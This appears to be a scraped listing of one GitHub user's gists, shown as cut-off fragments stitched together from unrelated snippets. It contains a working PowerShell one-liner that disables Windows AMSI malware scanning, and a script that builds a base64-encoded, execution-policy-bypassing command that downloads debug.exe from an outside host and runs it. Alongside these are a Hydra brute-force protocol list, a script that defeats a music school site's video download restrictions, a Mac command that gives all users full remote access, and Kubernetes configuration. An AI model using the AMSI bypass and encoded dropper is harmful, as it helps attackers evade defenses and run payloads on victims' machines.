Robert Ressl ressl

AMSI-No-More (Courtesy of PS)

$a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)

This one-liner can be used to effectively disable AMSI in your current session by essentially corrupting the current AMSI session (a session is created when any process is run, so what we are doing is killing it in our current process).

How it works

ressl / encode_cmd.ps1
Last active February 5, 2023 10:50
PowerShell script to encode command and set to clipboard
$remoteHost = '192.168.108.1'
$remoteFile = 'debug.exe'
$destSource = 'C:\Users\Public\debug.exe'
$psInject = "Invoke-WebRequest -Uri http://$remoteHost/$remoteFile -Outfile $destSource; $destSource"
$encInject = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($psInject))
$executeCMD = 'powershell -ExecutionPolicy Bypass -enc ' + $encInject
Write-Host $executeCMD
ressl / download.js
Created February 4, 2023 17:53
Yamaha Music School Download Video and Music offline
//video
// enable video download
$('video').removeAttr('controlsList');
var videofiles = document.getElementsByTagName('video');
var videotext = document.getElementsByClassName('icon');
var srcList = [];
var i = 0;

Hydra

Supported protocols

| List1 | list2 | list3 | list4 | list5 |
|---|---|---|---|---|
| asterisk | icq | oracle-listener | rexec | snmp |
| cisco | imap[s] | oracle-sid | rlogin | socks5 |
| cisco-enable | irc | pcanywhere | rpcap | ssh |
ressl / gist:41a8b9c157946d2b1c07242e9e55d4f5
Created September 3, 2021 09:15 — forked from nateware/gist:3915757
Start Mac VNC server from command line
# Step 1: Set privileges
$ sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -configure -allowAccessFor -allUsers -privs -all
Starting...
Setting allow all users to YES.
Setting all users privileges to 1073742079.
Done.
# Step 2: Allow VNC clients
apiVersion: v1
kind: Service
metadata:
  name: nginx-nodeport
spec:
  type: NodePort
  ports:
  - protocol: TCP
    port: 80
    targetPort: 80
apiVersion: v1
kind: Pod
metadata:
  name: busybox
spec:
  containers:
  - name: busybox
    image: radial/busyboxplus:curl
    args:
    - sleep
ressl / nginx
Created December 17, 2019 10:26
apiVersion: apps/v1
kind: Deployment
metadata:
  name: nginx
  labels:
    app: nginx
spec:
  replicas: 2
  selector:
    matchLabels:
[kubernetes]
name=Kubernetes
baseurl=https://packages.cloud.google.com/yum/repos/kubernetes-el7-x86_64
enabled=1
gpgcheck=1
repo_gpgcheck=1
gpgkey=https://packages.cloud.google.com/yum/doc/yum-key.gpg https://packages.cloud.google.com/yum/doc/rpm-package-key.gpg
ressl / keybase.md
Last active January 14, 2021 16:38

Keybase proof

I hereby claim:

  • I am ressl on github.
  • I am rressl (https://keybase.io/rressl) on keybase.
  • I have a public key ASAI_AuetlYYEnfHI-wEXDLg6jShxX01XzW6SHr3Ukinego

To claim this, I am signing this object: